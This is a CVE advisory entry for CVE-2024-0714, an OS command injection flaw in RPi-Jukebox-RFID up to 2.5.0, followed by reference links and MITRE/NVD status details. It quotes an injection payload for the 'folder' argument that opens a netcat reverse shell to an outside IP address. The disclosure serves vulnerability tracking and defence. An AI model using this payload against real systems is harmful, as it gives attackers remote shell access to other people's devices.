A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.
References
Link Resource
https://vuldb.com/?ctiid.251540 Permissions Required Third Party Advisory
https://vuldb.com/?id.251540 Third Party Advisory
History

No history.

cve-icon MITRE Information

Status: PUBLISHED

Assigner: VulDB

Published: 2024-01-19T14:31:04.112Z

Updated: 2024-01-19T14:31:04.112Z

Reserved: 2024-01-19T07:00:33.363Z


Link: CVE-2024-0714

JSON object: View

cve-icon NVD Information

Status : Modified

Published: 2024-01-19T15:15:08.997

Modified: 2024-05-17T02:34:52.977


Link: CVE-2024-0714

JSON object: View

cve-icon Redhat Information

No data.

CWE